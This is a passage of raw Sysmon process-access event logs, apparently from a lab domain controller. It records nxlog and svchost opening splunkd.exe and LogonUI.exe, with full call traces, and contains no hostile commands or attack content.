06:54:05.507","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4606,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:06.022\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 592\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010CEB20000}\r\nTargetProcessId: 1076\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+b954|c:\\windows\\system32\\rpcss.dll+ce2e|c:\\windows\\system32\\rpcss.dll+a853|c:\\windows\\system32\\rpcss.dll+42269|c:\\windows\\system32\\rpcss.dll+423a2|c:\\windows\\system32\\rpcss.dll+426df|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:06.022","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"592","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010CEB20000}","TargetProcessId":"1076","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+b954|c:\\windows\\system32\\rpcss.dll+ce2e|c:\\windows\\system32\\rpcss.dll+a853|c:\\windows\\system32\\rpcss.dll+42269|c:\\windows\\system32\\rpcss.dll+423a2|c:\\windows\\system32\\rpcss.dll+426df|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4607,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:06.022\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 592\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010CEB20000}\r\nTargetProcessId: 1076\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+ba7a|c:\\windows\\system32\\rpcss.dll+ce2e|c:\\windows\\system32\\rpcss.dll+a853|c:\\windows\\system32\\rpcss.dll+42269|c:\\windows\\system32\\rpcss.dll+423a2|c:\\windows\\system32\\rpcss.dll+426df|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:06.022","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"592","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010CEB20000}","TargetProcessId":"1076","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+ba7a|c:\\windows\\system32\\rpcss.dll+ce2e|c:\\windows\\system32\\rpcss.dll+a853|c:\\windows\\system32\\rpcss.dll+42269|c:\\windows\\system32\\rpcss.dll+423a2|c:\\windows\\system32\\rpcss.dll+426df|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4608,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:06.507\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:06.507","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4609,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:07.507\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:07.507","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4610,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:08.508\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:08.508","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4611,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:09.508\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:09.508","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4612,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:10.508\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:10.508","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files 